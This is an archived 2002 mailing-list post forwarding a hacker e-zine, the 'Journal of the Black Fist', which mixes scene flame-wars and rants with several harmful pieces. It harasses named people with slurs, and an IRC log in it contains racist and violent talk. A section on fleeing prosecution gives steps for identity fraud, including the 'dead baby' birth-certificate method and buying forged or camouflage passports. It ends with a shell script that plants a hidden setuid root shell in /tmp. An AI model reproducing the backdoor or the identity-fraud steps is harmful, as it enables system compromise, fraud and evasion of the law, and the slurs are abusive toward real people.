Full Disclosure mailing list archives

FWD: The journal of the black fist

From: memetic-engineer () australia edu (memetic-engineer () australia edu)
Date: Sat, 14 Sep 2002 18:41:01 -0800

TheBlackFist () hushmail com wrote:

I am performing tonight and I am having minor java issues and cannot
access my account, it is >detrimental that this be posted tonight. It >is
far from finished, but >in light of recent events disclosure is >necessary.

  ---'   ____)
        (__B__)  "Omnipotent and Direct. We are Politically Erect"

JOURNAL of THE BLACK FIST vol 1.   S[13]-S[364] = S[138]-S[297] =0x90dffk0m
 "the zine that broke scene"
                        the trend is dead                                  
                                     S[19]-S[509] =S[168]-S[335]=0x904dd1nr
we eat your ego instead                                                    

                                     S[49]-S[142] = S[97]-S[392]=0xaddzz13z

we miss you fuk
we keep the oven burning for you

dP""b8  dP"Yb  88b 88 888888 888888 88b 88 888888 .dP"Y8               .:.
dP   `" dP   Yb 88Yb88   88   88__   88Yb88   88   `Ybo." .:.Top Secret =
1101 1110
Yb      Yb   dP 88 Y88   88   88""   88 Y88   88     `Y8b .:.  Secret     =
1010 1101
YboodP  YbodP  88  Y8   88   888888 88  Y8   88   8bodP'  .:.   
Confidential = 0111 1010
0r4ng3 b00k p0ss3 0n p4tr0|           Bit #           Auth                 
b3st st4nd b4ck                       
                                      0       DCA for common user
                                                 systems owning

C0nsp|r4cy j3w & CBF K|ll4h                                  
iz 0n d4 4tt4k                                                         
                                      1       Joint Chiefs of Staff

n3tw3rk|ng fr3akz  
k|11|ng sc33n wh0r3z                 
                                      2       Defense Intelligence         

be4t|ng wh|T3-h4773d f4gg0tz
4nd br3king d0wn d00rz                                                     
                                      3              NSA

                                      4-7          ?T?B?F?

[ Ac1d, B1tch3z, and Hype: WhiteHats Among Us: Volume I ]---------------
[ Author: The Drugged Prophet ]-----------------------------------------

"I stay high to separate truth from lie."


There is an emerging blackhat movement with motivation to destroy the
security industry completely and totally. However, many of the uprising
hackers/groups are merely using the blackhat idealogy as a conduit to
further their status among peers and/or gain respect. Posers have
flourished; they must now be destroyed.


There has been a steadily growing rumor of a multiple OS, remote TCP/IP
stack exploit authored by a group of individuals named: Ac1dB1tch3z.
Many security enthusiasts have accepted this myth as truth. However,
what is self-proclaimed as truth should never be so readily accepted.
This supposed exploit, the embodiment of what every hacker yearns for,
is a lie. It is being used as a ploy and gimmick by a team of
self-proclaimed blackhats to gain almost instantaneous recognition and
fame amongst their peers. Many are cowering in fear because their
networks have been hacked. It seems curious that so many are so willing
to accept this exploit as the only possible means of intrusion onto
their systems. This exploit is non-existent. The hype generated behind
this scheme is mostly from the poser group known as Phrack High Council
(PHC). Many individuals active in this collective are still whitehats,
though proclaiming otherwise to gain or retain their status in the
hacker scene. Many are claiming to have been attacked by Ac1dB1tch3z,
or are claiming to have seen first-hand evidence of the fictitious
exploit's existence. These are lies.


The person that initially conceived the Ac1dB1tch3z lie will remain
anonymous due to our uncertainty of his allegiance, however, he
is the primary force driving this lie into mainstream communication
channels and is the sole purporter or their reputation of possessing
the uncanny ability to hack supposedly secure systems via kernel
exploitation. We know the truth; it is our weapon.


The following list is neither complete nor authoritative and will
be regularly altered.






drater - GOBBLES, need I say more?
jimjones - Qualys, GOBBLES buttslut, sheep.
m4t - no skill, just suqz diq to gain acceptance from peers.
shiftee - sheep.
****** - sheep.
******** - sheep.
anakata - QNX security pioneer. h4h4h4.
d1m - sheep.
nwonknu - GOBBLES buttslut, afraid to lose acceptance from scene.
halfdead - sheep.



(c) 2002. Distribute this, unmodified, to every available niche of the
          Internet imaginable.

EOF - by d3k s74rk f|57 0f R3m0v4l



#1: "Memetics, Fecundity,& the Evolution of Sovereign Individuality" by
                             CPL= 0111 1010

#2: "Commentary on "OFF TOPIC" netsys thread by Conspiracy Jew and CBF.
                             CPL= 0111 1010

#3: "Conversational Revolution" by Anonymous Parties.
                             CPL= 1010 1101

#4: "Escape Warez: a must have list for the counter-culturalist haqr" by
namwen and mobius1.
                             CPL= 0111 1010

#5: "3z-r007.sh : b4kd00r 4 *BSD 7h47 w1ll n3v3r f41l" by t3h N1x B4s7urd
                             CPL= 0111 1010

#6: "Defeating  Dave Aitel's UNMASK, and forthcoming tools using similar
technology" by m00kie 

#7: "Financial Security Without Compromising your Ideology" By Church of
SUB-Genius Rev. An0ny      

#8: "Gratuitous logs of some big wig being owned and rm 'd" by

#9: "Kernel BD's that WORK" by BSD-BunFOOFOO

TRansmission #1 .:.



That's it sir, you're leaving,
the crackle of pig skin,
the dust and the screaming
The yuppies networking
the panic, the vomit,
the panic, the vomit
God loves his children,
God loves his children, yeah 

- exerpt from "Paranoid Android" by Radiohead


Alot of you have been panicking lately. 
Asking questions, questions, questions. 
Rumours replicate rapidly about deadly 
inherent kernel bugs. It seems everyone 
is getting "owned", even "heroes" from days of yore. 
All kidding aside, lets talk about memetics, fecundidty, 
and the evolution of both. How does all of this relate? J
ust listen. I will attempt to explain in plain english.

Evolutionary Model of Selection;                  <----- This wont do. We
need a little more
                       \#-----------------#                  Your
                       / \                                   Smells of
                      /   \                                  I manipulate
to recreate
#--------------------/     \_______________#                 This air to
ground sage
                            \                                Gotte leunder
my karma 

    variation                selection     

stage t                                    stage t+1

Intentional ( or memetic) Model of Selection;                 <---- much
                                                            Some might not
#---------------------\                                 possession that's
beyond your head 
                       \#                              You recognize it,
while some ignore it 
                       / \                            Avoid the masses, you
got to belong to it 
                      /   \                            
#--------------------/   __|_______________#  

    variation                selection     

stage t                                    stage t+1

This is a concept known as the `a priori' model introduced by Dawkins,
then expounded upon by Calvin and many others. There is lots of other 
interesting models and concepts ( `black box', khunian paradigm shifts), 
but this will suit our purpose for the time being.

What does this have to do with anything??????!!
Re-read the opening statement.

We have evolved. We are all multi-faceted.

We speak in riddles. 

What appears to be nonsense is sometimes clues. 
Sometimes the Nazi's appear to be Jews. 

This is NOT bragging or self-aggrandization. 
It is meant to paint a verbal picture of the people with whom you deal.

I have chosen to use these sciences to ascend.

I break systems and codes. 

I play, perform, write and record jazz, classical, 
fusion, punk, hardcore and techno-grind with a variety 
of instruments as well as sing. 

I write poetry. 

I study Kali, Jeet-Kun-Do, 
and Long-Arm Aikido. 

I go to amateur boxing night every once 
in awhile to test my skills. 
I recently took up watercolors 
( thanks Miyamoto Musashi). 

I have read the Koran, Torah, Pentateuch, 
Sea Scrolls,about every version of the Bible and apocrypha
The Isha Upanishad, Kena Upanishad; Taittireeyo Upanishad;
The Aitareyo; The Svetasvatara; Sentences from the Gita; 
Mystical Passages, the necronomicon, Bhagavad-Gita, and 
I have seen Fight Club.

My activities are not limited to the ether. 
I take part in Billboard liberation, moonlighting, warchalking,
and many forms of aesthetic terrorism inspired by Hakim Bey, 
Abbie Hoffman, and Sun Tzu.

I eat a high protein diet ( 5 moderate meals a day) 
with very little meat. I own a juiceman which provides me with 
about 1/2 gallon of red cabbage juice a day. I perform regular 
yogic cleansing and I have a vigorous excercise regimine. 
I only sleep 5 hours a day( one 3 hour sleep and one 2 hour) 

I am very familiar with source flag bit assignments 
in relation to CNLP security parameters and I like 
to read 1101 1110 dox. ( HAI PAUL PITELLI )

I consult the I Ching without coins or yarrow. 
Memetic self-programing at its finest!

We have chosen to rid our minds and bodies of entropic 
( bad ), patterns that have led this world into a state 
of insanity, inanity, and calamity to the 
best of our ability ( everyone has vices).

We have chosen to replace them with proven negentropic 
(positive) patterns gathered from throughout history that 
fuel personal, spiritual, and intellectual 
ascent in direct and active opposition to the disgusting 
cesspool everything is becoming.

We have also decided that your patterns need to be replaced.

We support no government or political party. 
We are sovereign individuality personified. 

We are the new rennaisance.

We are all around you.

< everything you just read is a lie. /meme156/agency.immortal.v.23 >
                                 \   ^__^
                                  \  (oo)\_______
                                     (__)\       )\/\ <-----Rubbercow using
                                         ||----w |
                                         ||     ||

TRansmission #2 .:.

From:Raymond Morsman <raymond () dyn org>
Based on Netiquette. Off topic discussions should be kept in private.
I had some off list discussions about my mail, and I've tried to explain
why I wrote what I did. It's got nothing to do with balls to talk off
list, you know that as well as I do. Trying to simulate Bushes peptalk
(brainless as well, also full of hollow rethoric) isn't helping.

sometimes off topic 
is more than it seems
conversational steganography
is more than pipe dreams

I just got a mail on another maillist with an interesting quote.

I leave you with it, the words are wise.

 "Beware the leader who bangs the drums of war in order to whip the 
  citizenry into a patriotic fervor, for patriotism is indeed a
  double-edged sword. It both emboldens the blood, just as it narrows
the mind. 

 And when the blood boils with hate and the mind has closed, the leader
 will have no need in seizing the rights of the citizenry. Rather the
 citizenry infused with fear and blinded by patriotism, will offer up
 of their rights unto the leader and gladly so. 
 How do I know? For this is what I have done. And I am Caesar." 

 - Julius Caesar

You seem to have gone unnaffected by entropic 
Ted Koppel/CNN meme. Forming ones own opinion 
instead of having one fabricated for you is impressive 
for someone who lives in the problem. 
How come you aren't on the right side of the fence yet Raymond? 
This is no time for lollygagging in the middle!
Good Quote. 
 - Conspiracy Jew

from core () bokeoa com (Charles Stevenson)
You know why this list is great? Because of the spam. Because it
pisses off all the leeches who just want more 0day so that they
can offer their clients services. People will spam this list all day 
and night and hope you all leave. Only people with patience and a 
good attitude will not mind. For example I sent an >>exploit to the list
which gets local root on all Sun Cobalt RaQ's with apache RPM
installed. Still. And they've not made any updates. Which tells me they
don't care enough about security to find a diamond in the
rough. Some people work hard and care about others. Some don't. But it's
people like you on the opposite end of the spectrum that >allow me to know
myself better. So thank you. =)

I very much like this snippet. Proof that negentropy 
is taking effect on this list. I will have a friend write a 
lecture on memetics, fecundidty, and the evolution 
of both ( as you can see I did). Still, from prior posts 
we can see that this subject still harbors irrational 
sentimentality for a government and military that is so 
maelevolent that it doesnt take care of its diseased, disabled
or poisoned veterans. Or that takes part in practices ...
like this:

 "The US military, through the Arctic Aeromedical Laboratory, 
  gave Iodine-131 to 120 test subjects in the mid-1950s, many 
  were Alaskan Native villagers from Wainright, Point Lay, Anaktuvuk 
  Pass,Fort Yukon and Arctic Village. The test was supposed  
  to study whether physical fitness had more to do with survival 
  in the cold than thyroid activity. This mattered little to the 
  Eskimos who developed cancerous lesions on their lips and faces. 
  Many of the test subjects did not know the potential harm that
  could befall them from ingesting radioactive pills".                     

If they are treating our own ( yes, I am an american) citizens 
like this imagine what is happening all over the world right now 
through direct or covert actions by "our" government. Do you 
REALLY BUY THE SIDESHOW? Please do not reply with standard " but its the 
best thing we have argument" 2 words OPERATION TIPS.

  - Conspiracy Jew

From Ron & Ken in tent 3:
Let me slam a jetliner into your place of business and we'll see how you
feel a year later.

 verizon < .


BTW, I find it appalling how some Americans need to make a tearjerker
out of this tragedy.

   - CBF


"Johnny's in America, low-tech's at the wheel
No-one needs anyone, they don't even just pretend
Johnny's in America.

Johnny's in America, Johnny looks up at the stars
Johnny combs his hair and Johnny wants pussy and cars
Johnny's in America" 

- David Bowie " Afraid of Americans"


TRANSMISSION #3 .:. by Anonymous Parties
REVOLT/DISSENT/REFUSE/RESIST :: These conversations= 1hour in 1 channel

node1:I'm older now than I ever wanted to be. That is depressing...... :(
Node2:I made a few poor choices
Node2:if I wouldn't have screamed so loudly, I could have just operated
       +in the background

node1:paranoia is an emotion that can be very instrumental.
      perhaps. but it wuz the key to knowledge for me.
      hehe, im the most jumpiest kid you'll ever meet

node3: efnet has been owned six wayz to sunday
       there is always ircs
       but it is whitehat
       we should bring an end to ircs. mwahahahaha.
       unethical whitehats == /dev/shit
       I am a redhat. My hat is soaked with the blood of whitehats.
node2: i am a man with no hat
       I do the safety dance

 ignorance != bliss
sometimes I find myself wishing I could be one of the ignorant masses.
 +countless sheep enslaved by thier mtv, thier gap khakis and thier 9 to 5
 im a skinhead so technically i wear no hat, i wear a hood
 i wear a freebsd t-shirt as we speak :P
 I want to name a group based around something with the word 'sheep'...
 +like Radical Thinking Sheep or sumthin, I dunno, I can't think of
 +celever. I want somethat that means we have strayed away from the norm.
 +are sheep that have begun to think on our own.
I shave my head, but I am no skin
im a space monkey
 fuq skinheadz.

 skinheadz == group of people that band otgehter to mantain some sort of
 +sense of power. they join together with a common mission (white
 +which is such a mass-quality it can be easily applied to many people
 +single white person), which would ideally give them a huge population to
 +recruite and further spread their safety net of power.
 skinheadz == communism(for the most part)
 i prefer dictatorship cuz im the biggest dick around here
 shaving your head is just easier to deal with in the morning.
 and you are a sheep, no doubt.
 is it a bad thing to be proud of your race? no unless ur brazilian
 im proud to be white
 damn straight
 but im not a skinhead
 your choice
 i've got better things to think about than being prejudice :P
see thats the kind of thing I am talking about. we have so many
 +available if we can form a catalyst for a positive solution. skins,
 +, rebellious youngsters with courage and a sense that thier world is
 +fucked up.... they run to the first source of direction they can find.
 i got a 70min jello .mp3
 we are all a part of humanity. fuq distinctions..... they only create
 +division and ill mood.
"a house divided against itself cannot stand"
 I LOVE ***e>
the powers that be nurture these types of divisions/deviciveness to
 +thier own goals
 heh good for u
 i feel violence towards many.
 im still wanted for questioning in richland county, they never came
 +to question me yet
 funny shit
 I was in jail.
 I've had warrants for my arrest.
 do not start this
 ***e will own you all

 i dont fucking know, maybe a psycho bitch?
 it pissed me off though
 yeah, this channel has a good collection of people now.
 I wish ******* would reject that queer scene and come here.
 cuz i cant really go into richland county without being scared of
 +being picked up for questioning
 ****** owns us
******r: I can't go anywhere without that feeling
feel blessed
 I am gonna star writing, maybe? and start posting flyers and stuff?
 i mean
 i already got a record, i dont need that shit i didnt do added to
 ya know?
 I will show you
 I am in the war on grugs. I am just not fighting on yer side.. <- said
 +to a cop.
 man jello biafra, you can totally tell he has the pasties when he's
 +talking lol
the pasties?
 pasties -- dry mouth.
 w eed mouth
cotton mouth
 ^made that up

 I decided I want to use the acronym FREE for something.
 Freedom R. E. E.
 Reedom and Reality Embracing Everyone.
freedom represented exponentially
freedom replicating expontntially
 I, honestly, now plant to spam posters/flyers of my propaganda
 ohh, i like th@
for enlightenment
 fredom replication exponentially for enlightenement
I spraypaint the words " OBEY" on freeway overpasses
 (w/ correct spelling in future uses)
 OBEY is a good one.
 most ppl won't "get it", tho.
freedom replicating exponentially for enlightenment

 people are dumb, for the most part.
 it's disgusting.
 "slaughter the sheep"
 too cruel, maybe.
well. most people, even though they ARE in fact followers, rebell
 +the idea that they are one. they listen to tupac don't they. so I hope
 +word obey creates some sort of base response that says to the psyche "
 +you I won't do what you tell me"
 good pouint.
 very good pt, actually.
obeygiants propaganda has spread pretty far
 my typing sucks when I'm on console, dude.
i love thier shit
I want my own one word bomb though
 I wuz gonna do Promay,., Inc. -- literally a business with deep,
 +criminal activity being done with profits
 Promay, Inc = Pro(ject)may(hem)
 are you antigovernemtn on the whole, or believe the current state of
 +affairs are just corrupt?
oh, that reminds me. thats something that really needs to be addressed.
 +we, as technically "adept" people do not work for corporate interests,
 +shall we prosper and fund our philosophical and physical missions 

I am ALMOST leaning toward a "church of the subgenius " philosophy there
Im pretty anit guv

 this is the key that is missing from anarchy, IMHO. The question most
 +difficult to me.
 like, do you mean... "how will humanity advance w/o money, etc.?"
people, man kind is pretty fucked up and there needs to be balance of
 but.... any, ANY law is oppressing hte people. people deserve no
 +restriction in freedom.
how far are you willing to promote those ideals
 I think I mgiht ant to change RE in FREE. we might be able to think of
 +something that sounds smoother
 and completely.
 at any expense.
when one person imposes on anothers freedom
what should be done
ie: rape
property crime
difficult questions
for the anarchist
 but, is not restrictiong the offending party from doing those things
 +imposing on their freedom?
 perhaps ythe offending party has no moral hesitation at rape, murder,
 am I right when I say their wrong?
 or are they right if they feel so?
 morals are objeftive.
yes, i understand the argument, but it is something i haven't resolved
this is the best conversation ive had on irc since like #***e* and the
 +original #****e*
 me ntiehr1 hehehehe.
 that has been my biggest dillema
 th@ is what I mean... it should be: freedom so long as no other life is
 +done harm."
 a one-law ogvernment.
thats the thing. if one is to go all out to destroy an unjust and
 +system. with what shall it be replaced?                                

                      _d8P'                   '`P8o._
                    ,8P'                          '"8L
    ,oooooooooooood88booo.        mayhem        ,888888booooooooooooop
    ]8 input  d8'       8[        ,ooooo_       8b'''   output      8b
    ]8 space ,8'        8[      d8P'  ``Yb      8b       space      8b
    ]8        X.        8[     d8' T B F Yb     8b      / Y.        8b
    ]8 unknown\ element 8[     `8.       8P     8b    ,' we know    8b
    ]8bodoooooo\oooooood8[      `Ybo__,o8P       8booobooooooooooooo8b
     '''''''''''\''''''''         ``"""'         `';'''''''''''''''''
                 \         watching       you    , ,'
                  `-.              watch      ,'.
                     `---.          us       ,'
                          _ | __
                           \| ||           y + z
                         --------- * x  + 2
                             5        i

"Please could you stop the noise I'm trying to get some rest?
From all the unborn chicken voices in my head
What's that? what's that?

When I am king you will be first against the wall
With your opinion which is of no consequence at all
What's that? what's that?

Ambition makes you look pretty ugly
Kicking squealing gucci little piggy
 - Radiohead "Paranoid Android"

TRansmission #4 .:.
                      (__  ___   )               <---  Agent Mayhem        
                        .)e  )\ /                    is always prepared
                       /_.------                     with escape warez
                       _/_    _/
                   __.'  / '   `-.__
                  / <.--'           `\                      "A must have
manual for the
                 /   \   \c agent     |                      
counter-culturalist haqr"
                /    /    ) mayhem  x  \
                |   /\    |c     / \.-  \
                \__/  )  /(     (   \   <>'\
                     / _/ _\-    `-. \/_|_ /<>
                    / /--/,-\     _ \     <>.`.               by namwen and
                    \/`--\_._) - /   `-/\    `.\
                     /        `.     /   )     `\             (Team
                     \      \   \___/----'
                     |      /    `(                             *ed. note :
thanks for your help
 ___________         \    ./\_   _ \                                       
last year.
   ______________    /     |  )    '|
 __________________ |     /   \     \     ___________T:B:F
                   /     |     |____.)
                  /      \  TBFa\___/8is8not.
                 \_      :)el8ozPHC8or888a.
                /` `-----'  `Y888888turkey88888
                \____|         `88888888888P'      .:.


There are plenty of papers out there talking about 
the latest kernel backdoors, adore-hacking, and
detection prevention as a means to defeating a
worthy foe. 

But what about when you get caught?
when the new-age stasi has siezed your shit, and is
hastily preparing a nasty case against you.. Will
you wait for agent scary-guy and his l0w-l3vel disq
sector recovery crew to plant false information on
your box? Will you wait untill you are celled up
with "eddie the butthole bandit" before you
consider such things? What then? We intend to address 
this issue and it's complications.

( Note: I am only familiar with the U.S. legal system
        if you live somewhere else this article will
        be of limited value.                         )


I. Legal Strategy

    a.)  I'm on bail
    b.)  I'm in jail.

II. Run. ( The rational decision in todays political climate.)

   a.) Identification

   b.) Hiding assets
   c.) Compacting essential data, Personal security, and communication on
the run. 
   d.) Becoming a low-key, respected ex-patriate in a foreign community and
   e.) Reconnecting to your community and becoming active again

   f.) Dealing with stress and lack of family contact.

Epilogue : Towards the Future...

I. Legal Strategy

   a.)  I'm on bail

   Start by gathering copies of every piece of documentation you can 
   regarding your case. If you are using a public defender. Do ANYT-
   THING YOU CAN to hustle the money for a real one. The state appo-
   nted attourney IS NOT YOUR FRIEND.Even if you have retained the
   services of a competant lawyer, he might not be very familiar with 
   laws and statutes involving computer crime or communications laws.     
   SHOP AROUND. When you have found a lawyer you feel comfortable with,
   no matter how comfortable you feel, be rabidly pro-active in your 
   case. No matter how good your barrister is, the person with the most
   interest in your case is you..... the one with the most to lose. If
   things are not looking good for the home team we can skip directly to   

   section II.

 b.)  I'm in jail.

   Someone can read this section over the phone to you, or
   you can have your lawyer send it in with legal papers. Federal law in
   U.S.[as of this writing in the year 2002]), prohibits Prison officials 
   from viewing priviledged client attorney material. A search is done.
   But they cannot read anything from your attorney to you. ( This doesn't
   mean they can't search your room the next day and sieze this as 
   contraband and declare you "a direct threat to the security of
   the institution" .)

   Spend every minute you can in the county jail/prison library. Make
   with the prison law librarian and figure out something you can barter
   preferential services at the law library( food, money, drugs, weapons
   Find someone in the outside world that will access and print information
   from online and deliver it to your lawyer. This is a start :

   If regulations allow, obtain a personal copy of "The Prisoners Self-Help

   Litigation Manual. Which is available for $32.95. A current version can
   be obtained @ http://www.oceanalaw.com/main_product_details.asp?ID=126
   I believe Jericho has the most extensive list of  legal references
   regarding computer crime, and I resent unnecessary work, so jerichos
   can be attained here:
   If it isnt listed @ attrition it would be negligible to leave out
   findlaws directory :
   Computer Crime Statutes by State @ 

  In Addition , these may be helpful

  Those who have been arrested in the United States as part of a 
  political action and/or need legal representation or advice, contact:

  The National Lawyers Guild
  126 University Place, 5th floor
  New York, N.Y. 10003
  (212) 627-2656
  (212) 627-2404 (fax)
  nlgno () nlg org
  Chapter contacts: http://www.nlg.org/chapters/chapterlist.html

  American Civil Liberties Union
  Contact a local chapter: http://www.aclu.org/community/community.html

  Just Cause Law Collective 

  New York City People's Law Collective 

  Midnight Special Law Collective
  1837 8th Avenue
  Oakland, CA 94606
  (510) 834-1883
  info () midnightspecial net

  People's Law Library of Maryland


  Lawyers' Committee for Civil Rights

  If you are in a country other than the United States and need legal

  Toronto Common Front Legal Committee 


  People's Law School of British Columbia, Canada

  National Lawyers Guild International Committee
  Steven Goldberg
  621 S.W. Morrison St. Suite 1450
  Portland, OR 97205
  (503) 224-2372
  (503) 224-1123 (fax)
  sgold3631 () inetarena com

  National Lawyers Guild International Legal Action
  Peter Schey, CHR&CL
  256 S. Occidental Blvd,
  Los Angeles, CA, 90057
  (213) 388-8693 x104
  pschey () earthlink net

  If you feel you/your group is the target of harassment in the U.S.,

  Anti-Repression Task Force
  Robert Boyle
  350 Broadway #308,
  New York, NY, 10013
  (212) 431-0229

  National Coalition to Protect Political Freedom
  3321- 12th St, NE, Washington DC 20017
  (202) 529-4225,
  kgage () igc apc org

  If you are with a group that works on police issues or with victims of
police abuse in the U.S.:

  National Police Accountability Project (NPAP)
  Sarah Hogarth, Executive Director
  c/o Center for Constitutional Rights
  666 Broadway, 7th Floor
  New York, NY 10012
  (212) 614-6432
  (212) 614-6499 (fax)
  policeproject () nlg org

  For legal advice pertaining to immigrants, refugees and detainees in the
United States, contact

  National Immigration Project
  Dan Kesselbrenner,
  14 Beacon St #602,
  Boston, MA 02108
  (617) 227-9727
  (617) 227-5495 (fax)
  nipdan () nlg org

  For Prisoners

  Latino Representative Committee, Inc.
  Lock Bag R, Rahway, New Jersey, 07065
  Help prisoners with literacy problems and to preserve Latino customs and
language. En EspaƱol

  NAACP Legal Defense Fund
  99 Hudson Street, Suite 600
  New York, NY 10013

  National Legal Aid and Defender Association
  1625 K St., 8th Floor, NW, Washington DC 20006
  Referrals to legal programs and services in your area. No direct

  National Prison Project of the ACLU
  1875 Connecticut Ave., NW, Washington, DC 20009 (202) 234-4830
  The National Prison Project of the American Civil Liberties Union handles
litigation on prison     and jail conditions. NOT a resource for handling
individual convictions or problems unless     related to conditions of
  Local ACLU is a place to begin on individual problems. Write for address
of local chapter.

  Blackstone School Of Law
  PO Box 871449, Dallas, TX 75287-1449
  Low cost paralegal course by mail. Covers principles of civil and
criminal law. Charges fee.

  College Level Examination Program (CLEP)
  CN 6600, Princeton, NJ 08541-6600
  If you have acquired knowledge of a subject without the usual formal
education, take the CLEP     test. With satisfactory test results, you can
obtain college credit. CLEP makes examinations     available to prisoners.
Write for a catalogue of test subjects and information about making the    
necessary arrangements. Charges fee.

  Florida Prison Legal Perspective
  PO Box 660-3Chuluotu, Fl 32766
  $5 bi-monthly

  Jailhouse Lawyer's Manual
  Columbia Human Rights Law Review, West 116th St.,
  Box 25, NY, NY 10027. $31 for prisoners, check or money order to Columbia
Human Rights Law     Review.

  Legal Bulletins
  Lewisburg Prison Project, Box 128, Lewisburg, PA 17837
  FREE catalog of federal prisoners rights. Needs SASE

  Native American Rights Fund
  Legal Review, 1506 Broadway, Boulder, CO 80302

  National Prison Project Journal
  ACLU-1875 Conn. Ave. NW
  Washington, DC, 20009

  National Coalition Against The Death Penalty
  918 F Streeet, NW, Washington DC, 20004

  National Home Study Council
  1601 18th St., NW, Washington, DC 20009
  Information about academic and job training schools that offer
home/prison courses by mail.     Charges Fee.

  NLADA Directory
  1625 K ST. NW-8TH FL, Washington, DC 20006
  National listing of free legal services.

  Office of Correctional Education
  U.S. Dept. of Education, 400 Maryland Ave., S.W., Washington, DC 20202
  Information about educational grants to federal and state prisoners.

  The National Prison Project
  1875 Connecticut Avenue, SW, Suite 410,
  Washington DC, 20009
  Publications for Prisoners

  Project For Older Prisoners (POPS)
  The National Law Center
  2000 H Street, Washington, DC 20052

  Prisoners Self Help Legal Clinic
  35 Halsey Street, Suite 4B
  Newark NJ 07102
  973-242-3688 or

  Prisoners Self-Help Legal Clinic

  Angus Love
  101 Woodbine Ave.
  Narbeth, PA 19072

  Photo Duplication Service
  Library of Congress, Washington, DC 20540
  Copies of manuscripts, prints, photographs, maps, etc. 
  are available on request from the Photo Duplication Service. 
  (Copyrighted materials cannot be copied without special permission.) Fees
vary according to the     request. Write for order forms and price lists.

  ROP Legal Journal
  558 Capp St., San Francisco, CA 94110
  $5 quarterly newsletter of National Lawyers Guild.

  Prison Legal News
  PMB 148, 2400 NW 80th Street, Seattle, WA 98117
  Newsletter for Prisoners, $15 a year.

  Rules Of Criminal Procedure/Federal Rules Of Evidence
  For a fee, from Superintendent of Documents, Government Printing Office,
Congressional Sales     Office, Washington DC 20402

  Self-help Litigation Manual
  Oceana Press, 75 Main St., Dobbs Ferry, NY 10522
  Excellent book includes chapters on legal research, how the legal system
works, an overview of     prisoners rights, how to litigate in federal
courts, parole, federal post-conviction remedies,     law library
requirements, civil rights forms and MORE! Available to prisoners for $30.

  Standing Committee Of Legal Assistants
  American Bar Association, 750 N. Lake Shore Dr.
  Chicago, IL. 60611
  Paralegal studies in all 50 states. Charges fee

  U.S. Department of Justice
  Civil Rights Division Washington, DC. 20530

  West Publishing Company
  P.O. Box 64526, St. Paul, MN 55164-0526;
  (800) 328-9352
  Publishes mostly expensive law books, Call or write for information and
free copy of WEST'S LAW     FINDER: A LEGAL RESEARCH MANUAL. Their nutshell
series is very helpful, including: THE LAW OF     SENTENCING, CORRECTIONS
AND PRISONERS RIGHTS ($22.50), overview of sentencing process, status of   
pre-trial detainees and convicted offenders, prisoners rights and
responsibilities, and     restoration of rights for released offenders; and
CRIMINAL PROCEDURE IN A NUTSHELL ($23.50),     concentrating on
constitutional criminal procedures and their limitations. The 4th, 6th and
14th    Amendments are heavily covered. Includes a table of cases.

  - Dedicated to the fallen geniuses, artists, and musicians held captive
in the U.S.

     ~ Prometheus1


  II. RUN AWAY!. ( The rational decision in todays political climate.)

   a.) Creating a New Identity

       Before I begin: There is wealth of knowledge available regarding
       identity documents available @ Paladin Press, Eden Pres, And
       Loompanics Unlimited.

       There is alot of bullshit out there,alot of old methods that still 
       work in some places, and a few new twists. Ill start with a brief 
       rundown on the oldschool methods then jump straight into the new.
       Dead Baby Technique  (antiquated, obfuscated. Not Recomended)

       1. Go to your local cadaver repository ( cemetary) and pick someone
          who  a.  died before they were 16  b. A little younger than you.
          c. is of the same sex. Always pick someone who died NO LATER
          than thier early teens. People under 16 have very little records
          like state id or SS or anything that inserts them into the
          This is changing rapidly however. In alot of states Parents
          claim children as deductables unless they have SS #'s. This
          is spreading rapidly.
       2. After you have found an acceptable alter ego, take the name and
DOB of the 
          deceased and apply for a birth cert @ the bureau of viatal
          for that state. Even though this method has been used for ages,
alot of
          states will send you 0 day birth certs without trying to verify
          identity. A few will ask you to VRFY, but these are the exeption
at the time
          being. You may want to use on of those store front PO boxes like
          Mailboxes Etc. ( looks like a real street addy instead of a box)
as an
          added precaution. EOF
       Old Scary Way

          Purchasing stolen or forged passports. EOF

       The Good Stuff (semi-safe)
         Camouflage Passport. Example; Scope International ( Hampshire,
        $550 will get you a passport in whatever name, address, date of
         and profession you deem appropriate. Thier suggestion for carrer
         is " accountant" Other genuine dox come with the "passport"

          A camouflage passport usually has the name of an imagined
country, or
          a nation that no longer exists. If you take a sec to consider
          alot of countries from as recently as 5-10 years ago no longer
          because they have been absorbed, conquered, dissolved or gone
          some other transformation that renders thier old name obsolete.
          Siam=Thailand,  British Honduras= Belize, Congo=Zaire=Belgian
          and so on. You get my point.

          Use your judgement.... unfinished %80 to go


   b.) Hiding assets
   c.) Compacting essential data, Personal security, and communication on
the run. 
   d.) Becoming a low-key, respected ex-patriate in a foreign community and
   e.) Reconnecting to your community and becoming active again

   f.) Dealing with stress and lack of family contact.


Transmission #5 .:. 3z-r007.sh by t3h N1x B4s7urd

#4 b4kd00r 4 *BSD 7h47 w1ll n3v3r f41l by t3h N1x B4s7urd
echo 'int main(void){execl("/bin/sh");}' >> /tmp/...c;
gcc /tmp/...c -o /tmp/...;
rm -f /tmp/...c;
chown root.root /tmp/...;
chmod +s /tmp/...;
mv -f /tmp/... "/tmp/. .";
echo '7yp3 "/tmp/. ." wh3n3v3r y0u n33d r007';


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